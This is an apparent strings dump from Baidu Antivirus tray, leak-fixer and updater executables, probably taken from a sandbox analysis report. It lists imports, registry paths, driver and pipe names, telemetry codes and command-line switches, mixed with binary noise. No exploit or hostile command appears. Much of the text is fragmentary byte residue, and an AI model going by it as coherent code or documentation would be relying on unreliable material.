Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
CommonRes.rdb
file='skin_image16.png' xtiled='true' ytiled='true'
skin_image16.png
file='%s' xtiled='true' ytiled='true'
Global\{74B41C93-AC9A-4a9e-85E0-27A02EA509FA}
@Wintrust.dll
Crypt32.dll
6BE417DD-264A-4678-A036-74D2173ECCEB
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\Config\
3.0.0.3967
SWDesktopGuide.exebaiduanTray.exe_3012:
.text
`.rdata
@.data
.rsrc
@.reloc
D$u%SVW;9u.SWj8.uwSn<.ut>;:u.SWjPSSSSSShL$XQSShSPSSSShLocal\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag..\src\google\protobuf\generated_message_reflection.ccCHECK failed: (from.GetDescriptor()) == (descriptor):..\src\google\protobuf\message.cc: Tried to copy from a message with a different type.to:..\src\google\protobuf\message_lite.ccCHECK failed: !coded_out.HadError():..\src\google\protobuf\io\coded_stream.cc%d.%d.%dlibprotobuf %s %s:%d] %s..\src\google\protobuf\stubs\common.cc..\src\google\protobuf\descriptor.cc". To use it here, please add the necessary import.", which is not imported by "$0$1 = $2$0$1 $2 $3 = $4.PLACEHOLDER_VALUE.placeholder.protomap key must name a scalar or string field.map_key must not name a repeated field.CHECK failed: dynamic.get() != NULL:.foo = value"..dummyFieldDescriptorProto.extendee set for non-extension field.FieldDescriptorProto.extendee not set for extension field.Files that do not use optimize_for = LITE_RUNTIME cannot import files which do use this option. This file is not lite, but it imports "CHECK failed: !out.HadError():" is repeated. Repeated options are not supported.Import "Missing field: FileDescriptorProto.name.File recursively imports itself:..\src\google\protobuf\wire_format.cc..\src\google\protobuf\reflection_ops.cc..\src\google\protobuf\extension_set.ccCHECK failed: iter != extensions_.end():..\src\google\protobuf\extension_set_heavy.cc\xx..\src\google\protobuf\stubs\strutil.cc..\src\google\protobuf\io\zero_copy_stream_impl_lite.cc..\src\google\protobuf\descriptor.pb.ccgoogle/protobuf/descriptor.protogoogle/protobuf/descriptor.protogoogle.protobuf"G2$.google.protobuf.FileDescriptorProto"2 .google.protobuf.DescriptorProto2$.google.protobuf.EnumDescriptorProto2'.google.protobuf.ServiceDescriptorProto2%.google.protobuf.FieldDescriptorProto.google.protobuf.FileOptions.google.protobuf.SourceCodeInfo"2/.google.protobuf.DescriptorProto.ExtensionRange.google.protobuf.MessageOptions2 .google.protobuf.FieldDescriptorProto.Label2*.google.protobuf.FieldDescriptorProto.Type.google.protobuf.FieldOptions"2).google.protobuf.EnumValueDescriptorProto.google.protobuf.EnumOptions"l2!.google.protobuf.EnumValueOptions"2&.google.protobuf.MethodDescriptorProto.google.protobuf.ServiceOptions".google.protobuf.MethodOptions"2).google.protobuf.FileOptions.OptimizeMode:2$.google.protobuf.UninterpretedOption":2$.google.protobuf.UninterpretedOption*2#.google.protobuf.FieldOptions.CType:experimental_map_key2$.google.protobuf.UninterpretedOption"/2-.google.protobuf.UninterpretedOption.NamePart2(.google.protobuf.SourceCodeInfo.Locationcom.google.protobufBTokenizer::ParseInteger() passed text that could not have been tokenized as an integer:..\src\google\protobuf\io\tokenizer.ccTokenizer::ParseFloat() passed text that could not have been tokenized as a float:Tokenizer::ParseStringAppend() passed text that could not have been tokenized as a string:..\src\google\protobuf\stubs\substitute.cc..\src\google\protobuf\dynamic_message.cc..\src\google\protobuf\text_format.cc..\src\google\protobuf\descriptor_database.ccInvalid file descriptor data passed to EncodedDescriptorDatabase::Add().unsupported versioninflate 1.2.5 Copyright 1995-2010 Mark Adlerdeflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler1.2.5{C6642F75-8DBE-473d-A98B-940F84EF702C}CreateReportClientReleaseReportClient.\Global\ReportBase\msg.pb.ccdatapkg.FieldsListdatapkg.DataType{8CEFC9E6-A2B4-4c2a-823C-6903A31139FA}kernel32.dllc:\clientci\workspace\bdm_v3.0_fix_compile\stable_proj\include\thirdInclude\boost/exception/detail/exception_ptr.hpp.\filedispatch\FileDispatch.pb.ccconfig_service.proto.\config_service.pb.ccconfig_service.proto"(cmd_list.ConfigItem"@.ResultSetasio.miscasio.misc errorboost thread: trying joining itselfthread.entry_eventthread.exit_event1.0.1.1%d.%d
d-d-d d:d:d
RegKey
RootKey
SubKey
IsNative64Key
CryptMsgGetParam
CryptMsgClose
CertFindCertificateInStore
CertFreeCertificateContext
CertCloseStore
CertGetNameStringW
CryptCATCatalogInfoFromContext
System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
%s\Connection
Content-Length:%d
s.x.baidu.com
.\update.pb.cc
%s:%u
%u.%u.%u.%u
addr %s not good...
Unsupported Media Type
HTTP Version not supported
HTTP/1.0
HTTP/1.1
1.0.0.1
.\header.pb.cc
https
ftpes
ftps
tftp
% ;?:@=&,$/-_!.~*()
X;
%s>
%s="%s"
%s='%s'
version="%s"
encoding="%s"
standalone="%s"
c:\clientci\workspace\bdm_v3.0_fix_compile\basic\Output\BinRelease\BaiduAnTray.pdb
WS2_32.dll
?TranslateMessage@IControlManger@ExpandInterface@BDMSkin@@SA_NQAUtagMSG@@@Z
BDMSkin.dll
?GetBDMReportMgr@BDLogicUtils@@YAPAVIBDMReportMgr@1@XZ
BDLogicUtils.dll
BDMCommon.dll
?GetWindowsDirectoryW@utils@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ
BDMFrameWork.dll
SHDeleteKeyW
SHLWAPI.dll
GetProcessHeap
CreateIoCompletionPort
GetWindowsDirectoryW
GetSystemWindowsDirectoryW
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegOpenKeyExW
RegCreateKeyExW
RegDeleteKeyW
RegFlushKey
RegOpenKeyW
RegEnumKeyExW
RegQueryInfoKeyW
RegSetKeySecurity
RegNotifyChangeKeyValue
RegGetKeySecurity
RegOpenKeyExA
ADVAPI32.dll
ShellExecuteW
ShellExecuteExW
SHFileOperationW
SHELL32.dll
ole32.dll
OLEAUT32.dll
MSVCP80.dll
MSVCR80.dll
_amsg_exit
_wcmdln
_crt_debugger_hook
PSAPI.DLL
WTSAPI32.dll
USERENV.dll
NETAPI32.dll
imagehlp.dll
InternetCrackUrlW
HttpOpenRequestW
HttpQueryInfoW
HttpSendRequestW
WININET.dll
VERSION.dll
?SetAlpha@CBDMLabelUI@BDMSkin@@UAEXE@Z
?StartFadeInFadeOut@CBDMControlUI@BDMSkin@@UAEXEEKK_N0@Z
BaiduAnTray.exe
??_B?1??get_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@CAAAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ@51
?get_const_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@SAABV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ
?get_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@CAAAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ
?get_mutable_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@SAAAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ
?instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@0AAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@A
?is_destroyed@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@SA_NXZ
?t@?1??get_instance@?$singleton@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@serialization@boost@@CAAAV?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@XZ@4V?$singleton_wrapper@V?$multiset@PBVextended_type_info@serialization@boost@@Ukey_compare@detail@23@V?$allocator@PBVextended_type_info@serialization@boost@@@std@@@std@@@detail@34@A
.?AVCBDCmdParser@BDMLogicMisc@@
.?AVControlMgrMsgFilter@CBDMTrayApp@@
.?AVCExternalMsgLoop@@
.?AVCBDMConfigReportRecord@@
.?AVCPluginMenuItemExecutor@@
.?AVIPluginCmdExecutor@@
.?AVCBDMLauchReportRecord@@
.?AVCBDMCommonMsgBox@@
.?AV?$BDMNotifyDelegate@VCBDMCommonMsgBox@@V1@@ExpandInterface@BDMSkin@@
.?AVReportMessageBase@ns_reportbase@ns_global@@
.?AVRegSystemCallPassThrough@ns_common@@
.?AVReportClient@ns_reportbase@ns_global@@
.?AVTSMsg@@
.?AVIBDMMsg@@
.?AVTSMsgMap@@
.?AVITSMsgMap@@
.?AVTSMsgDispatcher@@
.?AVITSMsgDispatcher@@
.?AVTSMsgStub@@
.?AVITSMsgStub@@
.?AUPluginInfoPassiveSaver@@
.?AVCCmdPluginLauncher@@
.?AVCExePluginLauncher@@
.?AVheader@http@bena@@
.?AVresponse@http@bena@@
.?AVrequest@http@bena@@
#include "windows.h"
ÿF=
9(9.949:9@9
6|7u7
878W8%9s9
3i4-6}6$7F7
(0,00040807$8(8,808483-4I4Q4f4}4:.;@;`;~;6.7@7]7~79,:::\:}:= >5>=>"?5?1,2v2203c3v33@4c4v44P5c5v55`6s63L4V47u7C7H7X7f7l7|78‘9U9l9v90'0-030907'767`8|8:%:*:7:{:6o6W6\6f6p6~65#5)565?5^54!4.434>4?,?6?>?`?5/686@6`65(545@5\5:&:/:8:[:>%>,>3>:>0,20242822 2$2(2,202423 3$3(3|39 9$9(9,9090$0,040@0|0@01234567SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE\iexplore.exe\Internet Explorer\iexplore.exe%s\baidubrowser.exeHKEY_LOCAL_MACHINE\SoftwareHKEY_CURRENT_USER\Software\Classes\CLSIDHKEY_CURRENT_USER\Software\Classes\DirectShowHKEY_CURRENT_USER\Software\Classes\InterfaceHKEY_CURRENT_USER\Software\Classes\Media TypeHKEY_CURRENT_USER\Software\Classes\MediaFoundationHKEY_CLASSES_ROOT\CLSIDHKEY_CLASSES_ROOT\DirectShowHKEY_CLASSES_ROOT\InterfaceHKEY_CLASSES_ROOT\Media TypeHKEY_CLASSES_ROOT\MediaFoundationHKEY_LOCAL_MACHINE\Software\Wow6432NodeHKEY_CURRENT_USER\Software\Wow6432Node\Classes\CLSIDHKEY_CURRENT_USER\Software\Wow6432Node\Classes\DirectShowHKEY_CURRENT_USER\Software\Wow6432Node\Classes\InterfaceHKEY_CURRENT_USER\Software\Wow6432Node\Classes\Media TypeHKEY_CURRENT_USER\Software\Wow6432Node\Classes\MediaFoundationHKEY_CLASSES_ROOT\Wow6432Node\CLSIDHKEY_CLASSES_ROOT\Wow6432Node\DirectShowHKEY_CLASSES_ROOT\Wow6432Node\InterfaceHKEY_CLASSES_ROOT\Wow6432Node\Media TypeHKEY_CLASSES_ROOT\Wow6432Node\MediaFoundation%d.%d.%d.%dntdll.dllEXPLORER.EXEexplorer.exeBDMNet.dllBaiduHips.exeUDP-ADM_DRVE_ISTL_FIDUDP-ADM_DRVE_OPEN_FIDbdmantivirus\BDKitUtils.dllsystem32\DRIVERS\BDMWrench.sys%s\baidu\baiduan\Config\8001.datBaiduAnSvc.exe%Program Files% (x86)\Baidu%Program Files%\BaiduD:\Program Files (x86)\BaiduD:\Program Files\BaiduE:\Program Files (x86)\BaiduE:\Program Files\BaiduF:\Program Files (x86)\BaiduF:\Program Files\Baidu%s\BaiduHips.exeBaiduProtect.exe"%s\BaiduProtect.exe" -rBDMReport.dll%Program Files% (x86)\Common Files\Baidu%Program Files%\Common Files\BaiduD:\Program Files (x86)\Common Files\BaiduD:\Program Files\Common Files\BaiduE:\Program Files (x86)\Common Files\BaiduE:\Program Files\Common Files\BaiduF:\Program Files (x86)\Common Files\BaiduF:\Program Files\Common Files\Baidu%s\baidu\baidusd\Config\900.datBaiduSdTray.exeBaiduSdSvc.exe"%s\BaiduSdSvc.exe" -r"%s\BaiduAnSvc.exe" -r
xx
\\.\BDMWrench
Global\BDDefenseDriver{80438582-0F66-44E0-3D2B-2D7E872CBFBB}
CD61BB3A-403D-7650-5D9A-4E57EA1035E6
UDP-ADM_KITUTL_PH_SET_INVALID
UDP-ADM_WMWCH_PH_SET_INVALID
UDP-ADM_ST_ID:%d
UDP-ADM_DRVE_RUN
UDP-ADM_CLIENT_RUN
UDP-ADM_CPY_SYS_FID
UDP-ADM_OPEN_SYS_FID
UDP-ADM_INST_SYS_FID
UDP-ADM_SED_PAVER_FID
UDP-ADM_ATR_SET
UDP-ADM_SED_ATR_FID
UDP-ADM_SED_FSD
UDP-ADM_RPT_FID
UDP-ADM_FSD
\BaiduSdSvc.exe
\BaiduAnSvc.exe
UDP-ADM_RPT_INIT_FID
\system32\drivers\BDMWrench.sys
drivers\BDMWrench.sys
UDP-EVT_WFR
UDP-EVT_WFID
UDP-ADM_SED_PAVER2_FID
\BaiduSdTray.exe" -stmd=3
\BaiduAnTray.exe" -stmd=3
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
C9521EC1-6642-5CF6-8FB9-DE04639593BD
UDP-PS_KITUTI_PH_SET_INVALID
UDP-PS_LD_FID
UDP-PL_SRV_ID:%d
UDP-PL_SRV_RUN
UDP-PL_SRV_INSTPH_FID
UDP-PL_SRV_CK_REG_DAMG
UDP-PL_SRV_REPT01_FID
UDP-PL_SRV_REGREPIR_FID
UDP-PL_SRV_PL_FID
UDP-PL_SRV_REPT02_FID
UDP-PL_SRV_FSD
UDP-PL_TRY_ID:%d
UDP-PL_TRY_RUN
UDP-PL_TRY_INSTPH_FID
UDP-PL_TRY_UN_ATRUN
UDP-PL_TRY_REPT01_FID
UDP-PL_TRY_PL_FID
UDP-PL_TRY_REPT02_FID
UDP-PL_TRY_FSD
UDP-PL_RPT_INIT_FID
UDP-ADM_SET_KITU
UDP-ADM_SET_MWR_PATH
UDP-ADM_OS_ERR
UDP-ADM_PROC_DIR_UN_EXIST
UDP-ADM_PROC_GT_VER_FID
UDP-ADM_PROC_MATCH_FID
BaiduAnSvc.exe" -r
BDMDownload.dll
BDMUpdate.dll
uninst.exe
%s%d\%lld\
Download.data
download.db
publish.db
profile.db
%d_id
%d_version
%d_customer
%s%d\
metadata.db
NewTab_ErrorURL
\updateTips.dat
%s\FTSWManager\%s
sw_property.dat
sw_class_filter.db
{AF849809-EC94-47CB-80E9-1452BEC92ADA}
Baiduan.exe -stmd=2 -selplugin={D886CCB7-9946-4246-9502-D25F2F948431}\{BFB3F7A3-4FA1-466f-AB97-A96EFA9EFA6E}\{D8CD8DC5-D053-402a-99D9-47554C744B0C}
Onekey
Baiduan.exe -selplugin={D886CCB7-9946-4246-9502-D25F2F948431}\{BFB3F7A3-4FA1-466f-AB97-A96EFA9EFA6E}\{D8CD8DC5-D053-402a-99D9-47554C744B0C}
IconMsgWndClass
{1CB69707-E42B-4128-8A00-7336B93DC262}
baiduan.exe -stmd=6
{E9C9ED70-127F-4BE4-9821-74160A768A90}
{7576896A-4E2F-4665-AB7D-95938D2632F1}
{F5E93978-539C-476B-9A7B-B6C32025A557}
{BFB3F7A3-4FA1-466f-AB97-A96EFA9EFA6E}
{D8CD8DC5-D053-402a-99D9-47554C744B0C}
{5DF529E5-045B-4f5d-9F08-9F5328008DF7}
BDASoftmgr.exe -sm -openby=bdmtray
BDMgr.exe -stmd=7
BDMgr.exe -stmd=6
hXXp://weishi.baidu.com/feedback/
TrayPluginContainerConfig.xml
{E059A29F-D2ED-4f28-849A-851AA9D5A05C}
ic_info_64.png
ic_warning_48.png
ic_question_48.png
ic_done_48.png
QQ.exe
screen_snapshot.exe
SnippingTool.exe
CommonRes.rdb
HKEY_LOCAL_MACHINE\SOFTWARE\Baidu\BaiduAn
1800000
BDASoftmgr.exe
BDASWDeskGuide.exe
BaiduAnBugRpt.exe
BaiduAn.exe
BaiduAnUpdate.exe
CommonMsgBox
Client.exe
\GameNoDisturb.ini
Shell32.dll
FreeDistractionTips.xml
BaiduAn{D8A4131D-3A7A-48a1-B080-28E1DC04F7C2}
TrayMenu.xml
Config\config.ini
%d-%d-%d
btn_switch_on_normal.png
ActivateTrayApp_{E6F42A49-F45B-4FDF-ADD8-DFAE10011BD1}
{94F31545-51B0-433d-B3E2-7D3A0C6482F2}
ActivateMainApp_{6AD16C03-B3BA-4b15-B502-A0A603DC8092}\{5DF529E5-045B-4f5d-9F08-9F5328008DF7}
btn_switch_on_hover.png
btn_switch_on_pressed.png
btn_switch_off_normal.png
btn_switch_off_hover.png
btn_switch_off_pressed.png
3.0.0.185
hXXp://weishi.baidu.com
hXXp://weishi.baidu.com/privacy.html
about.xml
kBDMNet.dll
c:\bd_swtray_log.txt
%s:%d
D:\BDdownloads
QueryIpcAddressHelper
testtips.xml
Global\{74B41C93-AC9A-4a9e-85E0-27A02EA509FA}
Mfile='skin_image16.png' xtiled='true' ytiled='true'
skin_image16.png
file='%s' xtiled='true' ytiled='true'
B\\.\pipe\{B99F6A00-E6C9-4253-9708-C6EFB939FD53}
CommonMsgBox.xml
\kernel32.dll
Windows 8.1
Windows 8.0
Windows 7
Windows Vista
Windows 7
Windows Vista
Windows Server 2003,
Windows XP
Windows 2000
Windows NT
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009
Windows 95
Windows 98
Windows ME
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
okernel32.dll
HKEY_USERS
LKernel32.dll
xxxxxxxxxxxxxxxx
Software\Microsoft\Windows NT\CurrentVersion\Time Zones\
Software\Microsoft\Windows NT\CurrentVersion\ProfileList\
Software\Microsoft\Windows NT\CurrentVersion\Print\
Software\Microsoft\Windows NT\CurrentVersion\Ports\
Software\Microsoft\Windows NT\CurrentVersion\Perflib\
Software\Microsoft\Windows NT\CurrentVersion\NetworkCards\
Software\Microsoft\Windows NT\CurrentVersion\Language Pack\
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
Software\Microsoft\Windows NT\CurrentVersion\Gre_Initialize\
Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\
Software\Microsoft\Windows NT\CurrentVersion\Fonts\
Software\Microsoft\Windows NT\CurrentVersion\FontMapper\
Software\Microsoft\Windows NT\CurrentVersion\FontLink\
Software\Microsoft\Windows NT\CurrentVersion\FontDpi\
Software\Microsoft\Windows NT\CurrentVersion\Console\
Software\Microsoft\Windows\CurrentVersion\Telephony\Locations\
Software\Microsoft\Windows\CurrentVersion\Setup\
Software\Microsoft\Windows\CurrentVersion\PreviewHandlers\
Software\Microsoft\Windows\CurrentVersion\Policies\
Software\Microsoft\Windows\CurrentVersion\Group Policy\
Software\Microsoft\Windows\CurrentVersion\Explorer\KindMap\
Software\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\
Software\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers\
Software\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes\
Software\Microsoft\Windows\CurrentVersion\App Paths\
Software\Microsoft\SystemCertificates\
Software\Microsoft\EnterpriseCertificates\
system32\winlogon.exe
\Global.db
BWintrust.dll
Crypt32.dll
iphlpapi.dll
B\\.\PhysicalDrive%d
\\.\Scsi%d:
B6BE417DD-264A-4678-A036-74D2173ECCEB
d-d-d
L{X-X-X-XX-XXXXXX}
D823ABCA-A92F-429d-9E11-3779B5F682AA
\NotInstalledPlugin.xml
\GlobalPluginInfo.xml
\LocalPluginInfo.xml
\PluginSetup.xml
\HotPlugins.xml
\HotPlugin.bnr
PluginSetup.xml
{E5B65788-3C2C-4F59-92E7-58C9205BC66E}
C##cmd:
DUninstalledPlugins.xml
/handle=%d /supplyid=%d /installmode=2 /S /D=%s
PackCache.xml
BDMUPDATE_{626ADED9-5989-4e97-A482-09AC95C17D47}
.bdtmp
.old_
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0
0123456789
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\Config\
BaiduanTray.exeBDALeakfixer.exe_3188:
.text
`.rdata
@.data
.rsrc
@.reloc
PSSSSSSh
asio.misc
asio.misc error
c:\clientci\workspace\bdm_v3.0_fix_compile\stable_proj\include\thirdInclude\boost/exception/detail/exception_ptr.hpp
inflate 1.2.5 Copyright 1995-2010 Mark Adler
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
1.2.5
CryptMsgGetParam
CryptMsgClose
CertFindCertificateInStore
CertFreeCertificateContext
CertCloseStore
CertGetNameStringW
CryptCATCatalogInfoFromContext
X;
%s>
%s="%s"
%s='%s'
version="%s"
encoding="%s"
standalone="%s"
c:\clientci\workspace\bdm_v3.0_fix_compile\basic\Output\BinRelease\BDALeakfixer.pdb
?GetBDMReportMgr@BDLogicUtils@@YAPAVIBDMReportMgr@1@XZ
BDLogicUtils.dll
?GetWindowsDirectoryW@utils@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ
BDMFrameWork.dll
SHLWAPI.dll
BDMSkin.dll
GetWindowsDirectoryW
GetProcessHeap
KERNEL32.dll
USER32.dll
RegOpenKeyExW
RegCloseKey
ADVAPI32.dll
ShellExecuteW
ShellExecuteExW
SHFileOperationW
SHELL32.dll
ole32.dll
MSVCR80.dll
_amsg_exit
_wcmdln
_crt_debugger_hook
MSVCP80.dll
WS2_32.dll
imagehlp.dll
GetSystemWindowsDirectoryW
RegDeleteKeyW
RegCreateKeyExW
.?AVCBDCmdParser@BDMLogicMisc@@
.?AVTSMsg@@
.?AVIBDMMsg@@
.?AVTSMsgMap@@
.?AVITSMsgMap@@
.?AVTSMsgDispatcher@@
.?AVITSMsgDispatcher@@
.?AVTSMsgStub@@
.?AVITSMsgStub@@
.?AUPluginInfoPassiveSaver@@
.?AVCCmdPluginLauncher@@
.?AVCExePluginLauncher@@
.?AVIPluginCmdExecutor@@
ÿF=
77X7
0#0*070_0
11
=#=5=:=^=
00S0Z0f0w0
>%>,>3>:>
6 6$6(6,60646
download.db
publish.db
profile.db
BDALeakfixer.exe
BaiduAn{BCAE54CF-7A1E-4842-908B-3D0AEF98409B}
PatcherContainer.xml
D{0C8BFEC2-961C-4777-ADBE-522A06690AD9}
BaiduAn.exe
BaiduAnTray.exe
\\.\pipe\{B99F6A00-E6C9-4253-9708-C6EFB939FD53}
Global\{74B41C93-AC9A-4a9e-85E0-27A02EA509FA}
Kernel32.dll
Dxxxxxxxxxxxxxxxx
Wintrust.dll
Crypt32.dll
6BE417DD-264A-4678-A036-74D2173ECCEB
D823ABCA-A92F-429d-9E11-3779B5F682AA
\NotInstalledPlugin.xml
\GlobalPluginInfo.xml
\LocalPluginInfo.xml
\PluginSetup.xml
\HotPlugins.xml
\HotPlugin.bnr
PluginSetup.xml
{E5B65788-3C2C-4F59-92E7-58C9205BC66E}
BPackCache.xml
BDMDownload.dll
B/handle=%d /supplyid=%d /installmode=2 /S /D=%s
%d.%d
##cmd:
UninstalledPlugins.xml
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion\Time Zones\
Software\Microsoft\Windows NT\CurrentVersion\ProfileList\
Software\Microsoft\Windows NT\CurrentVersion\Print\
Software\Microsoft\Windows NT\CurrentVersion\Ports\
Software\Microsoft\Windows NT\CurrentVersion\Perflib\
Software\Microsoft\Windows NT\CurrentVersion\NetworkCards\
Software\Microsoft\Windows NT\CurrentVersion\Language Pack\
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
Software\Microsoft\Windows NT\CurrentVersion\Gre_Initialize\
Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\
Software\Microsoft\Windows NT\CurrentVersion\Fonts\
Software\Microsoft\Windows NT\CurrentVersion\FontMapper\
Software\Microsoft\Windows NT\CurrentVersion\FontLink\
Software\Microsoft\Windows NT\CurrentVersion\FontDpi\
Software\Microsoft\Windows NT\CurrentVersion\Console\
Software\Microsoft\Windows\CurrentVersion\Telephony\Locations\
Software\Microsoft\Windows\CurrentVersion\Setup\
Software\Microsoft\Windows\CurrentVersion\PreviewHandlers\
Software\Microsoft\Windows\CurrentVersion\Policies\
Software\Microsoft\Windows\CurrentVersion\Group Policy\
Software\Microsoft\Windows\CurrentVersion\Explorer\KindMap\
Software\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\
Software\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers\
Software\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes\
Software\Microsoft\Windows\CurrentVersion\App Paths\
Software\Microsoft\SystemCertificates\
Software\Microsoft\EnterpriseCertificates\
system32\winlogon.exe
{X-X-X-XX-XXXXXX}
%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\Config\
3.0.0.3971
BDLeakfixer.exeBaiduAnUpdate.exe_3124:
.text
`.rdata
@.data
.rsrc
@.reloc
PSSSSSSh
SShwB
%D|PFB|
..\src\google\protobuf\message_lite.cc
CHECK failed: !coded_out.HadError():
%d.%d.%d
libprotobuf %s %s:%d] %s
..\src\google\protobuf\stubs\common.cc
..\src\google\protobuf\io\coded_stream.cc
..\src\google\protobuf\io\zero_copy_stream_impl_lite.cc
inflate 1.2.5 Copyright 1995-2010 Mark Adler
deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler
1.2.5
{0F7048BB-E983-47bb-825E-0C2BF9F95719}
{8CEFC9E6-A2B4-4c2a-823C-6903A31139FA}
X;
%s>
%s="%s"
%s='%s'
version="%s"
encoding="%s"
standalone="%s"
1.0.1.1
%d.%d
d-d-d d:d:d
RegKey
RootKey
SubKey
IsNative64Key
CryptMsgGetParam
CryptMsgClose
CertFindCertificateInStore
CertFreeCertificateContext
CertCloseStore
CertGetNameStringW
CryptCATCatalogInfoFromContext
Content-Length:%d
s.x.baidu.com
c:\clientci\workspace\bdm_v3.0_fix_compile\stable_proj\include\thirdInclude\boost/exception/detail/exception_ptr.hpp
.\update.pb.cc
%s:%u
%u.%u.%u.%u
addr %s not good...
Unsupported Media Type
HTTP Version not supported
HTTP/1.0
HTTP/1.1
1.0.0.1
.\header.pb.cc
https
ftpes
ftps
tftp
% ;?:@=&,$/-_!.~*()
System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
%s\Connection
c:\clientci\workspace\bdm_v3.0_fix_compile\basic\Output\BinRelease\BaiduAnUpdate.pdb
?StartFadeInFadeOut@CBDMControlUI@BDMSkin@@UAEXEEKK_N0@Z
?SetAlpha@CBDMLabelUI@BDMSkin@@UAEXE@Z
BDMSkin.dll
BDMFrameWork.dll
?GetBDMReportMgr@BDLogicUtils@@YAPAVIBDMReportMgr@1@XZ
BDLogicUtils.dll
IMM32.dll
SHDeleteKeyW
SHLWAPI.dll
GetProcessHeap
GetWindowsDirectoryW
GetSystemWindowsDirectoryW
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
RegCreateKeyExW
RegSetKeySecurity
RegFlushKey
RegNotifyChangeKeyValue
RegGetKeySecurity
RegDeleteKeyW
ADVAPI32.dll
ShellExecuteW
SHFileOperationW
ShellExecuteExW
SHELL32.dll
ole32.dll
MSVCP80.dll
PSAPI.DLL
MSVCR80.dll
_amsg_exit
_wcmdln
_crt_debugger_hook
WTSAPI32.dll
USERENV.dll
imagehlp.dll
InternetCrackUrlW
HttpOpenRequestW
HttpQueryInfoW
HttpSendRequestW
WININET.dll
NETAPI32.dll
?GetWindowsDirectoryW@utils@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ
WS2_32.dll
RegOpenKeyExA
BaiduAnUpdate.exe
.?AVCCmdLine@@
.?AVCBDCmdParser@BDMLogicMisc@@
.?AVCBDMCommonMsgBox@@
.?AV?$BDMNotifyDelegate@VCBDMCommonMsgBox@@V1@@ExpandInterface@BDMSkin@@
.?AVTSMsg@@
.?AVIBDMMsg@@
.?AVTSMsgDispatcher@@
.?AVITSMsgDispatcher@@
.?AVTSMsgStub@@
.?AVITSMsgStub@@
.?AVTSMsgMap@@
.?AVITSMsgMap@@
.?AUPluginInfoPassiveSaver@@
.?AVheader@http@bena@@
.?AVresponse@http@bena@@
.?AVrequest@http@bena@@
ÿF=
5%5S5g5y5
1,2
5%5s5x5
i0-2}2$3F3
='=6=`>|>
0%0*070{0
